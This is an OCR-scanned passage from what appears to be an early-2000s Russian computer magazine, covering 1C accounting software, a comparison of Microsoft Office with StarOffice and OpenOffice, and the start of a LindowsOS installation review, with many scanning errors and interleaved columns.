все в одно соединить? Но язык 
этот - довольно полезная штучка. 
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Непонятно на что похожий встроенный макроязык 1C 


Ведь конструктора не хватит на 
что-то серьезное. Для создания ре- 
альных динамических документов 
придется поработать ручками. Что- 
бы понять этот язык, надо либо раз 
пять перечитать книжку о встроен- 
ном языке программирования (пос- 
тавляется вместе с покупкой ли- 
цензионного ПО), либо выпить не 
один литр пива, разбираясь в коде 
уже созданных документов. 


ОВЕРЛОАД - ОТЧЕТУ СМЕРТЬ 
Если ты работаешь админом, кон- 
фигуратор тебе может даже и не 
пригодиться. А вот если сервак, на 
котором хранятся все рабочие ба- 
зы, в один момент рухнет, то звез- 
дюлей получишь именно ты, и ник- 
то иной. А творится это обычно из- 
за большой нагрузки. Прикинь, ес- 
ли человек 30 одновременно обра- 
щаться к одной и той же базе, а 
сервак это весьма средний компуш- 
ник, используемый как хранилище 
данных... Не стоит рассказывать, 
что может произойти. Но крику от 
бухгалтерш будет достаточно :). 
Еще может понадобиться посмот- 
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Админский прибамбас из IC - “Монитор” 


реть, не выполняет ли кто в данный 
момент работу за человека, у кото- 
рого сегодня выходной. Обычно 
после таких добрых порывов слу- 
чается увольнение отдыхавшего - 
ему могут такое с базой натворить, 
что пипец просто: могут приходни- 
ки с расходниками добавить непо- 
нятного происхождения, удалить 
список номенклатуры. Для наблю- 
дения за тем, кто в данный момент 
работает с базой, в арсенале 1С 
есть "Монитор". Как ты, наверно, 
догадался, это не девятнадцати- 
дюймовая элцедешка, а прога для 
наблюдением за активностью обра- 
щений. 


Тут все довольно просто: тулза 
показывает, кто, в какое время ис 
какого компушника залогинился к 
базе. Настоящий админ в таких слу- 
чаях может сделать две вещи: либо 
повесить пользователя удаленно, 
либо повесить пользователя физи- 
чески :) - в зависимости от сложив- 
шейся ситуации. 


ОТЛАДИМ БУХГАЛТЕРИЮ 

Как уже было сказано выше, в 1C 
есть свой встроенный язык прог- 
раммирования. Но кто же может на- 
писать программу с первого раза и 
без ошибок? Речь тут, конечно, не 
о расчете простенькой формулы, а 
о реальной проге (точнее, модуле). 
В некоторых имеющихся докумен- 
тах листинг модулей довольно 
большой (потянет как минимум 
листиков на 30 при печати). Как тут 
не запутаться? Тем более, надо же 
все протестировать, а тест на рабо- 
чей базе проводить не рекомен- 
дую. Вот тут на помощь 1С'никам 
приходит “Otnaguuk”. Тут проверя- 
ется работоспособность и произво- 
дительность системы. 


КУПИТЬ ИЛЬ НЕ КУПИТЬ? 
Если есть хоть какая-то возмож- 
ность купить лицензионную 1С, то 
лучше покупать. Периодически 


1-А$5 ‘ный “Отладчик” 


бланки отчетностей для подачи в 
налоговую меняются, а 1С такие ве- 
щи обновляет и зарегистрирован- 
ным пользователям предоставляет 
обновления своей продукции. К то- 
му же новые версии идут, как пра- 
вило, доработанными, с исправле- 
нием багов, которые были обнару- 
жены по ходу работы, ускорены не- 
которые обработки. Искать эти об- 
новления в Инете - почти бесполез- 
ное занятие, ибо их хрен два най- 
дешь. Если кто-то выложит обнов- 
ление, то его ресурс очень быстро 
закрывают. Иначе придется подк- 
лючать драйвер устройства hands, 
чтобы сделать новую версию блан- 
ков платежных поручений. Поста- 
вить обновление программы - 5 ми- 
нут максимум, а делать один шаб- 
лон по ГОСТу - намного больше 
времени. Пучше сидеть и ничего не 
делать, чем очередной раз велоси- 
пед изобретать, тем более что 
деньги за софт платишь не ты. Так 
что делай выводы. 


ЧЕМ БЫ ЗАМЕНИТЬ? 
Такого аналога, чтобы полностью 
заменить 1С, наверное, не сущест- 
вует. Во всяком случае, мне пока 
не попадались достойные. Но неко- 
торые вещи можно делать и в дру- 
гих программах, таких как “АК- 
ЦЕНТ”, “ByxCocpt”, "Сова" и неко- 
торые другие. Но они не настолько 
многофункциональны, как софт от 
1С, и не могут полностью заменить 
1С для ведения бухгалтерии и соз- 
дания аналитических отчетов. “AK- 
ЦЕНТ” - продукция украинских 
программеров, а уж что они там по- 
наделали, мало кому известно. Тем 
более, российским пользователям 
будет не очень удобно с обновле- 
нием программы. А вообще - это 
почти полностью содранная с 
1С:Предприятия прога. Аналог peg- 
ко бывает лучше оригинала. Прог- 
рамму "Сова" используют для под- 
готовки и печати документов орга- 
низаций, которые долго не живут. 
Эта программа - что-то типа Excel's, 
адаптированного для бухгалтеров. 
У 1С есть кроме всяких плюсов 
еще один: вместе с пустой базой 
устанавливается еще одна, демон- 
страционная. Только она не явля- 
ется демо-версией базы, как это 
может показаться из названия. Это 
образец того, как надо вести базу и 
что в ней можно делать. То есть, 
если человек не умеет работать с 
1С:Предприятием, то по этой демке 
он при наличии желания сможет 
довольно быстро разобраться с ос- 
новными принципами работы, даже 
не ходя на всякие курсы и не вык- 
ладывая за них кругленькую сумму 
бабла. А ведь это важно как для 
админа, так и для его босса. Намек 
понял? 


ЖУРНАЛ ДЛЯ АКТИВНЫХ 
ПОЛЬЗОВАТЕЛЕЙ МОБИЛЬНЫХ 
ЦИФРОВЫХ УСТРОЙСТВ 


В НОМЕРЕ: 


® Отборные новости 

® Оригинальные тесты 

® Полезные советы по выбору 

® Рекомендации по использованию 

® Каталоги устройств 

® А также: полезные программы, 
обзоры, ноутбуков, цифровых 
фотокамер и многое другое. 


НА ДИСКЕ: 


© Самый нужный софт для Palm, Psion, 
Pocket PC, ноутбуков, цифровых камер 
и сотовых телефонов на одном диске 


Журнал "МС" - самый 
технический из популярных 
и самый популярный 

из технических. 
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ТЕСТЫ ОФИСНЫХ ПАКЕТОВ 


Xander aka Александр Денисов 
(denissov@upv.vodokanal.spb.ru) 


NetShow 
Encoder нажа- 
тием двух 
кнопок с ис- 
пользованием 
мастера поз- 
воляет устро- 
ить по локал- 
ке трансляцию 
видео или ау- 
дио, при этом 
не отжирая 
память и ре- 
сурсы проца в 
немереных ко- 
личествах. 


Microsoft Word 
- стандарт ge- 
факто. Доку- 
менты в 90% 
офисов печа- 
таются в 
Bopge. 
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Итак, сегодня на повестке дня извечный вопрос, есть ли жизнь на Марсе? Ты 
наверняка согласишься, что кем бы ты ни был: линуксоидом, винформатором, 


админом или хакером, тебе реже или чаще приходится набить текстик или наваять 
табличку-другую. Условия и задачи у всех разные, но частенько складывается 
ситуэйшен, когда ленивому админу приходится вылезать в Винду (ну или жутко 
извращаться), чтобы чиркануть начальству служебную записку или забить план 
работ на месяц вперед. И что, это парево неизбежно? 


пособов породить ма- 
кулатуру есть множе- 
ство, но сегодня на- 
шей целью является несколько 
комплексных пакетов из разряда 
all-in-one. В синем углу ринга в тя- 
желой весовой категории у нас 
Microsoft Office. Версию я буду рас- 
сматривать 2000 Professional, прос- 
то потому что она стоит у меня ле- 
гальная (да, вот такой я извраще- 
нец, шутка, на работе был куплен, я 
и воспользовался случаем :)), пол- 
ное издание на 3 CD. В красном yr- 
лу ринга - Star Office от корпорации 
Sun Mycrosystems и его клоняра - 
Open Office, практически близнецы- 
братья, второй, правда, уступает 
старшенькому... И играют они на 
разных полях: один бьется на вин- 
довом поле, другой на линуксовом, 
но различия между ними - мини- 
мальны, посему, если один отлича- 
ется в чем-то от другого, я буду об 
этом упоминать, а так одна хрень. 


MICROSOFT OFFICE - В ГРЕЦИИ 
ВСЕ ЕСТЬ 

Итак, Microsoft office. Hy, YTo я могу 
сказать. Процесс установки софта 
на новую машину у меня выглядит 
так: Винда, Винамп, Офис. Именно 
так, потому что без офиса никуда. 
Я не могу сказать, что юзаю его на 
все 100%, но пользовать его при- 
ходится на работе до 6 часов в 
день. Итак, набор Microsoft Office 
2000 Professional Edition. Для 6y- 
мажек - Word (Ворда), для элект- 
ронных таблиц - Excel (Exenb), базы 
данных - Access, органайзер - 
Outlook (Аутглюк), редактор веб- 
страниц - Frontpage, редактор пре- 
зентаций - PowerPoint, средство 
создания набора документов - 
Binder, простенькая прога для ска- 
на, просмотра и редактирования 
фотографий - Photo editor и мощ- 
нейший редактор схем - Visio. Так- 
же в комплекте идет еще куча прог, 
про которые многие не знают и так 
и не узнают никогда, например, 
NetShow Encoder, который нажати- 
ем двух кнопок с использованием 


me 
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Васик форева... 


мастера позволяет устроить по ло- 
калке трансляцию хочешь видео, 
хочешь аудио, при этом не отжи- 
рая, кстати, память и ресурсы про- 
ца в немереных количествах, что 
для Винды обычно не характерно. 


ВНАЧАЛЕ БЫЛ WORD 

Microsoft Word - стандарт де-факто. 
Документы в 90% офисов печата- 
ются в Bopge. Никуда от него не 
деться и не избавиться от докумен- 
тов в формате .doc с вшитыми в 
них макросами. Ну и что, что этот 
макрос, как недавно всплывший у 
нас в сетке на работе Yota, при отк- 
рытии документов по приколу меня- 
ет каждую третью запятую на 
“@na". Представьте ужас наших ма- 
шинописок, когда во всех догово- 
рах, контрактах длиной не один де- 
сяток страниц появляется лекси- 
ческий нюанс, характерный для 
“чиста конкретных пацанов” :). Я 
валялся... Таким образом, мы приш- 
ли кеще одному приложению, вхо- 
дящему в Microsoft Office, а именно 
- VBA. Visual Basic for Application. 
Да, Васик и сейчас живее всех жи- 
вых. И Васик рулит. Почему, объяс- 
ню на конкретном примере. Мне по 
долгу работы приходится ежеднев- 
но для получения технологическо- 
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го отчета родного предприятия об- 
рабатывать данные из ОБВС'шной 
базы. Можно было бы выдирать 
ручками, но проще было написать 
макруху (макрос), которая выдира- 
ет эти данные из базы и компонует 
их в нужном мне виде в экселевс- 
кий файл, который потом обрабаты- 
вается следующей макрухой, и на 
выхлопе мы имеем красивенький 
отчет, сделанный за 2 нажатия 
кнопки и за 5 минут, а ранее это за- 
нимало ни много ни мало - полдня. 


Конечно, можно было б это реали- 
зовать с помощью дельфей или 
прочего чего-нибудь еще, но НА- 
ФИ-ГА??? Если здесь все есть в 
комплекте, делается просто и особо 
не напрягает. На самом деле у меня 
написан вагон макрух под Excel, ко- 
торые реально дают мне спокойно 
жить и упрощают производствен- 
ный процесс. Так что VBA - рулит 
однозначно. Да и приколов на нем 
можно сделать - не ходи купаться :). 
Вернемся к Ворде. Настройки дан- 
ного пакета дадут фору даже гра- 
фическим прогам - все включенные 
панели инструментов превращают 
рабочее none Word в систему уп- 
равления космическим кораблем :). 
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Ворда во всей своей мощи 


Неважно, нужно это или нет, но 
ведь это есть в комплекте? Значит, 
это кому-нибудь нужно :). А еще ту- 
да классно сам по себе встроился 
Finereader. Мелочь, а приятно... 
Проверку правописания я решил 
проводить на тексте песен альбома 
“Пираты ХХ! века" группы Ленинг- 
рад. Как видно на скриншоте, из- 
рядно уже подправленный мной 
словарь, встроенный в Офис, зах- 
лебнулся от потока новых интерес- 
ных слов :). Разрисовав весь доку- 
мент красным, офис не успокоился. 
Пришлось ему объяснить все грам- 
матические формы, возможные для 
некоторых слов великого и могуче- 


го русского языка. 
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Великое и могучая русские языку :) 


Об Ехеле я упомянул, а сейчас 
немного о пакетах, входящих в 
ОФИС. Powerpoint - инструмент для 
подготовки презентаций. Мощный, 
удобный, навороченный, но порож- 
дающий файло таких диких разме- 
ров, что иногда просто диву даешь- 
ся. Если взять сотню фотографий 
со средним размером 60 кб (общим 
объемом, соответственно, 6 мет- 
ров) и впихнуть их в презентацию, 
то на выхлопе получим 15-метровое 
файло. Новое правило математики, 
не иначе :). 

Binder - вещь, сравнимая немного 
с ОпенОфисовским global docu- 
ment, но на порядок более удобная. 
Я больше скажу - офигенная вещь! 
Представь себе ящик, куда ты сва- 
ливаешь все, что относится к ка- 
кой-либо теме. Например, ты иссле- 
дуешь НЛО :). Тогда создаешь под- 


шивку и кидаешь туда все файло, 
связанное с твоим увлечением. 
Впихнуть туда можно все докумен- 
ты Microsoft Office u кое-что еще, 
например, COREL'oBckue рисунки. 


Папочка с Х-файлами 


чии и отсутствуют возможности 
для его установки. Кстати, для та- 
кого, можно сказать, бонусного па- 
кета у него достаточно неплохие 
возможности. 

Frontpage. Хе-хе... незабвенный 
фронтпэйдж. Что характерно, в за- 
бугорье туева хуча народу юзает 
его и нарадоваться не может. Да и 
у нас тоже, собственно. Мелкософ- 
том для него выпускаются наборы 
для сборки паг: всякие кнопочки, 
бэкграунды и прочее. Только BOT 
сколько лишнего он вставляет в 
код - это уму непостижимо. Manno, 
созданное во Фронтпэйдже, почи- 
щенное в Macromedia 
Огеатмеауег, весит в два, а то и 
более раз меньше! А если взять 
еще и блокнот... То руки отвалятся 
выделять лишние теги и давить 
кнопку Delete. 

Теперь о том, чего нет у конкурен- 
тов ив ближайшее время вряд ли 
появится, - Visio. Для тех, кому это 
слово ничего не говорит, поясню - 
это мощнейший редактор схем, с 
огромным набором готовых моду- 
лей (назовем их так). Позволяет 
строить следующие схемы: диаг- 
раммы, строительные планы, схемы 
баз данных, принципиальные схе- 
мы для электронного инжиниринга, 
диаграммы производственных про- 
цессов, карты, механические схемы, 
карты компьютерных сетей (исклю- 
чительные схемы получаются, надо 
сказать), схемы организаций, схе- 
мы процессов, протекающих в уст- 
ройствах, карты места преступле- 


Binder - вещь, сравнимая немного с Опен- 
Осисовским global document, но на поря- 
док более удобная. Я больше скажу - 
осригенная вещь! Представь себе ящик, 
куда ты сваливаешь все, что относится к 
какой-либо теме. 


Базы данных - ну, тут Ассез$ вне 
конкуренции, потому как конкурен- 
там-то предложить абсолютно не- 
чего, кроме возможности подклю- 
чения внешних баз данных. А Ак- 
сесс, надо сказать, достаточно неп- 
лохой. Только глючит и глухой :). 
Короче, как базу данных его юзать 
можно в качестве каталогизатора 
домашней ‹фонотеки. И то я бы не 
рискнул. Но - на безрачье и рыба 
раком встает. Многих он устраивает 
- в принципе, можно юзать для хра- 
нения данных о персонале неболь- 
шой конторы, человек на 100, go- 
пустим. 

Microsoft photo editor - скажите 
честно, кто им пользуется? Но в 
принципе, когда нужно что-то быст- 
ро отсканить, подретушировать или 
еще чего, то можно и заюзать. Осо- 
бенно, если фотошопы нет в нали- 


ния (прикинь! силуэтики трупов, лу- 
жи крови, валяющиеся “стволы” и 
ножи, правда, ее скачивать нужно) 
и многое, многое другое. Там неме- 
реная куча иконок, которые можно 
подправить и экспортировать куда- 
нибудь, чтобы юзать на усмотрение 
своей больной фантазии. Еще при- 
кольная тема - это создание карты 
веб-сайта. То есть ты натравлива- 
ешь его на сайт, а он начинает тебе 
его строить. Реальная вещь! Даже 
более чем! 

Про потоковое вещание из Офиса 
я уже упоминал, но сейчас скажу 
подробнее. Находишь в папке с 
Офисом файло NSREX.EXE и запус- 
каешь его. Интуитивно понятный 
интерфейс (люблю эту фразу) даст 
тебе возможность через 5 минут 
вещать в локалку или Инет (в зави- 
симости от толщины твоего канала, 
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Visual Basic 
for Application С 
и сейчас жи- 
вее всех жи- 
вых. И Васик 
рулит, потому 
как без допол- 
нительных 
тулз и затрат 
времени ты 
можешь авто- 
матизировать 
свою нудную 
работу. 


Visio - это 
мощнейший 
редактор схем 
с огромным 
набором гото- 
вых модулей, 
фишка М$, 
которая вряд 
ли в ближай- 
шее время по- 
явится у кон- 
курентов. 


Опен Офис 
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13 октября 
2000 года 
корпорация 
Sun Microsys- 
tems открыла 
исходники 
СтарОфис. 

И началось... 
Группа това- 
рищей заня- 
лась разработ- 
кой открытого 
офиса. 


На сайте 
ОпенОфис за- 
регистрирова- 
но около 10 
миллионов 
слитых копий 
и 80 с гаком 
тысяч зареги- 
стрированных 
пользовате- 
лей. Таким об- 
разом, мы вы- 
яснили число 
людей, кото- 
рые пожалели 
200 баксов на 
прокорм go- 
машних пира- 
ний Билла 
Гейтса :). 


page 


конечно). Возможно, Shoutcast 
справится с этим получше, но 
представим, что нет у тебя шаут- 
каста. А Офис есть... и выньдоуз 
медиаплеер есть, которым можно 
приконнектиться к этому потоку. 


ЧТО НАМ СКАЖЕТ ТОВАРИЩ 
МАУЗЕР? 

Два брата-акробата. StarOffice и 
OpenOffice. Ну, про звездный офис 
можно долго не рассказывать. Соз- 
данный Sun Microsystems, это един- 
ственный полноценный офис, рабо- 
тающий под пингвином. Koffice в 
расчет можно не брать, потому как 
птица не того уровня. Так что он у 
нас вроде как и вне конкуренции, 
получается... Ну ладно, покопаемся 
в Звезодах... 


МЕ ALL MADE OF STARS 
CtTBpOqopuc я юзал под порядко- 
вым номером 5.2 и, честно говоря, 
не знаю, есть ли новее :), мне и это- 
го хватает. 

Open office - халявная попытка 
завалить гиганта от мелкомягких. 

13 октября 2000 года корпорация 
Sun Microsystems открыла исходники 
СтарОсрис. И началось... Группа то- 
варищей занялась разработкой отк- 
рытого офиса. Не могу сказать, что 
пакет плох. Он хорош, но пока, под- 
черкиваю - ПОКА он не конкурент 
монстру от Билла Гейтса. Пока что 
Майкрососрт бьет OpenOffice по всем 
статьям на всех сфронтах. У Оупена 
есть отличные находки, реализован- 
ные лучше, чем у М$, но их количе- 
ство слишком мало по сравнению с 
теми возможностями, которые нам 
дает Microsoft О!Йсе. Естественно, 
если все твои задачи в офисном па- 
кете упираются в написание одной- 
двух бумажек в неделю, то тебе не- 
зачем париться и замыкаться на 
Микрососфт, можешь скачать и пос- 
тавить OpenOffice, но, может, тебе 
хватит и Polyedit? Отличный pegak- 
тор, надо сказать. Ладно, попробуем 
разобраться с тем, что мы имеем на 
халяву, на которую, как известно, и 
вобла - осетрина. На сайте ОпенОф- 
ис зарегистрировано около 10 мил- 
лионов слитых копий и 80 с гаком 
тысяч зарегистрированных пользо- 


вателей. Таким образом, мы выясни- 
ли число людей, которые пожалели 
200 баксов на прокорм домашних 
пираний Билла Гейтса :). Рассказы- 
вать я буду о двух пакетах одновре- 
менно, если в одном пакете есть что- 
то отсутствующее в другом, это бу- 
дет озвучиваться. По дефолту же 
принимаем, что они похожи как кло- 
ны, чем они, в принципе, и являются. 
Writer - текстовый редактор, анти- 
под Ворды. Хотя нет, не антипод. 
Ворда рвет его по функциональ- 
ности как крысу поролоновую. К 
сожалению, хотя как простенький 
текстовый редактор райтер вполне 
катит, но если нам нужен, как гово- 
рили в стародавние времена, “текс- 
товый процессор", Ворда рулит, og- 
нозначно. Райтер можно сравнить с 
чуть более навороченным блокно- 
том, хотя, как мне показалось, он 
проигрывает даже PolyEdit. Для то- 
го чтобы называться офисным па- 
кетом, а не текстовым редактором, 
настроек маловато, но открывает 
вордовские документы исправно, 
иногда, правда, путается в шриф- 
тах, но это поправимо. Проверка 
орфографии - тоже вполне на 
уровне, хотя и не такая четкая, как 
в Bopge. Но вот здорово порадова- 
ла такая фишка, как “Автопилот”. 
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Отличный визард создания доку- 
ментов. Там есть абсолютно пин- 
цетный шаблон повестки дня :). Ну 
а что делать, нужны они иногда. 
Да, в Ворде тоже есть шаблоны, но 
если в Bopge ты просто берешь и 
правишь его, то здесь ты создаешь 
шаблон с помощью мастера, на ne- 
ту выкидывая из него все то, что 
тебе не нужно, с добавлением не- 
обходимых пунктов, ИМХО - жир- 
НЫЙ ПЛЮС. 

Ну и о плохом. Начав с частнос- 
тей, перейду к общему. Иногда для 
своих друзей мне приходится де- 
лать персональный штрихкод с 
именем человека. Типа модно стало 
татухи такие делать в последнее 
время. Так вот, в Ворд они портиру- 
ются, а в райтер нет. Такая же бот- 
ва и с другими импортируемыми 
объектами. 

Calc - возможная замена Ехелю. 
Ну, давай посмотрим, на что мы мо- 
жем поменять нашего счетовода. 
Встроенных функций почти 290 
против 235 у экселя. Результат для 
новичка более чем неплохой. Чем 
же он нас еще удивит? Удивит он 
нас приблудой “Навигатор”. Чем 
она интересна? Да тем, что показы- 
вает все объекты в текущем доку- 
менте: таблицы, области данных, 
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wet! 


Минимализм это круто 


области данных из баз данных, свя- 
занные области, объекты OLE, ри- 
сунки, в общем, все, что есть в 90- 
кументе. В ехеле такого нет, а 
жаль. Но в остальном калька отса- 
сывает. Потому как ненастраивае- 
мый интерфейс - реально отстой- 
ная вещь. Сравни три скрина, и все 
будет понятно. 

По поводу написания макросов 
для старофиса и опенофиса у меня 
возникло противоречивое чувство. 
С одной стороны, там немереное 
количество заготовок кода, кото- 
рое реально упрощает жизнь, с 
другой - там нет элементарных ве- 
щей, например, вставки формы OG- 
HOW КНОПКОЙ... 

Есть в нем еще одна Ganga, cy- 
ществующая, надо отметить спра- 
ведливости ради, и в офисе от 
Билла, но реализованная здесь го- 
раздо мощнее - автотекст. Начина- 
ешь ты чего-то там тапать по кла- 
ве, а через некоторое время прога 
сама начинает пихать тебе разные 
предложения по завершении раз- 
ных длинных слов. Раздражает не- 
имоверно :)! Поначалу... Потом, 
когда фигаришь курсовик с каки- 
ми-то немереными по длине науч- 
ными терминами или текст на 
иностранном языке, понимаешь 
всю прелесть этой фишки. Попро- 
бовал обучить его дописывать за 
меня фамилию Бьйорк - получи- 
лось! Так что даже с такими слова- 
ми, как Gudmundsdottir, он отлич- 
но справляется :). Короче, печата- 
ешь, не смотря на клаву (я наде- 
юсь, ты печатаешь, не смотря на 
клаву, так ведь? :), а при появле- 
нии сочетания знаков из базы 
прога предложит тебе вариант, 
подходит - жмакай Enter, нет - пе- 
чатай дальше. Еще можно настро- 
ить автозамену наиболее часто 
встречающихся очепяток. Я, нап- 
ример, часто фигарю “nocomTpen” 
вместо “посмотрел”. Но ведь и в 
Ворде это есть... 

Еще есть “Исключения” - тебя не 
бесит, когда Ворд, после того как 
ты написал “встретимся в 12 Yac.", 
фигарит большую букву? Меня, 
честно говоря, дико бесит! Здесь 
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Жизнь без плана - жизнь впустую 


ты можешь забить нужные сокра- 
щения и забыть о больших буквах. 
Еще можно прямо в текстовый доку- 
мент загонять данные из баз данных. 
Навигатор вызывается пимпой Е 4. 
Еще есть такая сришка, как поле 
данных. Де-факто это переменная, 
вместо которой в текст будет подс- 
тавлено нужное тебе значение. 
Фишка в том, что можно ограни- 
читься колонтитулом, а можно ис- 
пользовать подстановки из базы 
данных. То есть создаешь таблицу с 
именами людей и всякими адреса- 
ми-атрибутами и, юзая один шаблон 
с соответствующими полями, авто- 
матизируешь процесс распечатки 
писем, например, когда нужно отве- 
тить сразу многим людям. Вызыва- 
ется эта прелесть клавишами “Ctrl- 
[2". Опять же нужно заметить, что 
подобная байда есть и в Bopge. 
Еще одна довольно оригинальная 
фигня зашита в CTapOqouce и Опе- 
HOcpuce. В них стилями текста py- 
лит “Стилист”. Дави ЕП и разбирай- 
ся. Здесь настраивается все, что 
касается облика твоего документа, 
все стили разводятся по иерархии, 
типа как дерево. На деле очень 
удобно. В стиле абзаца можно про- 
сетапить шрифт, атрибуты, цвета, 
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интервалы, выравнивание Ha стра- 
нице и прочее и прочее. 


АРГАНАЙЗМИРУЙ! 
Теперь обратимся к органайзерам. 
Известно, что Аутглюк оправдывает 
свое название. Вместе с тем куча 
народу юзает его и будет продол- 
жать юзать. Ну да Пикачу с ними. В 
ОпенОфис органайзера нет. Ну нет 
его! В СтарОсхрисе есть. Разбит он, 
правда, на две части: одна из них 
называется Events, другая Tasks; 
соответственно, одна является на- 
поминалкой, другая - задачником. 
Как видно, опять OH отсасывает у 
Аутлюка в плане дизигна, хотя по бе- 
зопасности дает 100 очков сфроры. 
Но... у меня есть органайзер в Мозил- 
ле, извини, детка, мое сердце занято. 


РЕЗЮМЕ ПО ФАКСУ 

Короче говоря, пока, повторюсь, 
ПОКА в Винде лучше офиса от 
Микрососрт не найдешь. А вот если 
они свой офис в Линукс портиру- 
ют... Боюсь, тогда и Старофису кир- 
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Органайзер 
СтарОфиса 
отсасывает у 
Аутлюка в 
плане дизигна, 
хотя по безо- 
пасности дает 
100 очков 
форы. 


Райтер можно 
сравнить с 
чуть более на- 
вороченным 
блокнотом, хо- 
тя, как мне 
показалось, он 
проигрывает 
game PolyEdit. 
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В июле 2001 
года челом по 
имени Майкл 
Робертсон 
(Michael 
Robertson) 
была основана 
компания 
Lindows.com. 


В результате 
"самый гуман- 
ный"' суд ре- 
шил все прос- 
то: послать на 
три веселых 
буквы дядю 
Билла и от- 
дать лейбак 
“"Линдовс" 
Майклу. Гип- 
гип ура! Ось 
будет жить! 


раде 


Vint (vint@townnet.ru) 


се началось не очень 
давно. В июле 2001 
года челом по имени 
Майкл Робертсон (Michael Robert- 
son) была основана компания 
Lindows.com. 


КАК СКРЕЩИВАЛИ р 
ПИНГВИНА С ФОРТОЧКОЙ 
Надо сказать, что мэн этот далеко 
не был человеком ниоткуда, это 
бывший руководитель многими лю- 
бимого MP3.com, и поэтому у него 
были соответствующие знания и 
возможности, чтобы начать такой, 
прямо скажем, неслабый проектик. 
Сперва Lindows.com решили 
действовать очень просто: сообра- 
зить версию Linux (зацени, версию, 
а не отдельную ОС), на которой бу- 
дет работать большинство софта 
от Виндов. Но все пошло далеко не 
так гладко, как хотели. Великий и 
могучий мелкомягкий Билл заму- 
тил судебный конфликт, и в ре- 
зультате Линдовс Тим отказалась 
от первоначальных планов и стала 
говорить, что ее операционка бу- 
дет работать только с “мостовыми 
Windows-nporpamMMamn", что на наш 
язык означает - основной софт бу- 
дет работать. Такими “мостовыми 
Виндовс программами" являются 
некоторые основные части мелкого 
офиса и експлорера ;). Это заста- 
вило всех круто призадуматься, хо- 
тя и так в декабре прошлого года 
зло-корпорация объявила, что на- 
мерена через суд отобрать имя 
“Линдовс” у Майкла. Обосновыва- 
ется это тем, что юзеры могут спу- 
тать Линдовс с их великой маст- 
дайкой и “по ошибке" приобрести 
не ту ось :). На что очень хорошо 
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ответил глава Линдовов в своем 
письме дядюшке Биллу: “Hackonb- 
ко я понял ваше исковое заявле- 
ние, вы говорите, что покупатели 
будут путать наше слово 
“LindowsOS" и слово Windows из 
операционных систем Microsoft “XP 
Professional” и "ХР Home”. Однако 
любой, взглянув на логотип 
Lindows, может убедиться, что тот 
ничуть не похож на логотип 
Windows ХР”. Так что еще до суда 
проницательный взгляд видел во 
всей этой шумихе по поводу новой 
оськи только попытку мелкомягких 
прибить конкурентов. Точно так же 
можно сказать, что наименование 
Windows, считающееся теперь то- 
варной маркой Mukpocogpta, задол- 
го gO них использовалось в Юникс, 
в частности в его графической обо- 
лочке X-window. Я уж молчу про 
МАС OS, с которой Билли в наглую 
слизал графическое ядро Виндов. 
В результате “самый гуманный" суд 
решил все просто: послать на три 
веселых буквы дядю Билла и от- 
дать лейбак "Линдовс" Майклу. 
Гип-гип ура! Ось будет жить! 

А сейчас посмотрим, что же собой 
представляет эта шумная, являю- 
щаяся в ночных кошмарах мелко- 
мягким топ манагерам операционка. 


ВОТ ТАКИЕ МЫ... МУТАНТЫ 
Начну с того, что я честно перепи- 
сал 385 мегов инсталлера ОС с 
именем LindowsOS 3.0.5 от 
2002.12.09_13.00, хотя при этом в 
папочке _disk да в файле info было 
красиво написано LindowsOS 0.91. 
Дальше меня заинтересовали сис- 
темные требования, которые, ИМ- 
ХО, слегка завышены: 500 МГц ка- 
мень, 128 метров мозгов да еще гиг 
на винте. Я открыл этот диск в Вин- 
дах, дабы почитать реадмихи и пос- 
мотреть на инсталлер, работающий 
в форточках (go этого я в инете по- 
шастал, и многие с пеной у рта 
расхваливали инсталлер этой ОС, 
позволяющий ставить ее без пере- 
разбивки диска), но то ли у меня 
версия больно новая, то ли больно 
кастрированная, но ничего подоб- 
ного я не нашел. Была лишь одна 
страничка с ссылкой на 
http://www.lindows.com, и все. То 
есть по инсталл-инфе этот дистр - 
на нуле, даже в инсталляхе ДОСа 
было чего почитать. 

Ну что делать, не впервой. При- 
нялся я с замиранием сердца пере- 
загружаться в надежде запустить 
инсталл с сидирома. Mga... По заг- 
рузке - стандартный линуховый 
дистр, даже сообщения, выводимые 


на экран, слово в слово пингвиньи. 
Hy, продолжим. Переход в графи- 
ческую часть установки у меня оз- 
наменовался великим зависоном. 
Система вообще не реагировала ни 
на что, и так постоянно, только пе- 
реход в графику, и все... аут! Про- 
бившись с этим траблом тридцать 
минут, я таки нашел решение: жмем 
при начале загрузки shift+caps lock 
и выбираем режим Vesa install, при- 
чем никаких подсказок о том, что 
можно чего-то нажать, нет и в по- 
мине. Я опять вздохнул и подумал: 
“Если установка началась с такого 
финта, то как она будет работать- 
то дальше?". А дальше меня удиви- 
ли еще сильней и опять неприятно: 
инсталлятор упрощен до такой сте- 
пени, что поставить любую Винду 
по сравнению с Линдовс - все рав- 
но что настроить сервак на кон- 
сольном юнихе восьмидесятых го- 
дов выпуска. За всю инсталляцию я 
увидел только ОДИН вопрос: "Куда 
ставить?” - и все, хотя и был в ре- 
жиме эксперта... 


После десятиминутного инсталла 
(да, установка длилась ровно де- 
сять минут) я на всякий случай схо- 
gun, налил, чего осталось со вче- 
рашнего ;), и нажал на ресет, меч- 
тая лицезреть новоявленную Ось, 
и сразу увидел морду передранно- 
ro Lilo. Ладно, Линдовс, давай пока- 
зывай, что тут у тебя. Но после 
двух минут загрузки я увидел толь- 
ко черный, антрацитовый экран. 


Мыльное убожество 


ботчиков опять меня обманули: 
когда после трехминутного процес- 
са загрузки я узрел веселый видок 
на консоль мутанта, спертую у Ли- 
нуха. Я офигел - хотелось бы уви- 
деть хоть какой-то GUI, пусть с ми- 
нимальной конфигурацией, видюха 
- как стандартный VGA адаптер, ко- 
роче, как в сейф моде у Виндов. 
После такого финта мне стал не- 
понятен третий пункт загрузчика - 
configure. Хмм... загрузим... По экра- 
ну пробежали те же сообщения о 
ходе загрузки... В результате - та 


“Насколько я понял ваше исковое заяв- 
ление, вы говорите, что покупатели будут 
путать наше слово “LindowsOS" и слово 
Windows из операционных систем 
Microsoft "ХР Professional” и "ХР Home". 
Однако любой, взглянув на логотип 
Lindows, может убедиться, что тот ничуть 
не похож на логотип Windows ХР". 


Что за!.. Неужто этот гад прибил 
мне винт или попалил железо (чего 
только не приглючится от неожи- 
данности)? Дрожащей рукой нажал 
на перезагрузку - Винда загрузи- 
лась нормально. Тут gO меня дош- 
ло: Линдавс юзает графический 
сервер XFree, причем, судя по вер- 
сии ядра, используется версия 4.2, 
которая сильно меня парила, пыта- 
ясь врубить 3D ускорение через та- 
кую Ж, что мой джифорс 256 заги- 
бался и выдавал черный экран, что 
и было удачно продемонстрирова- 
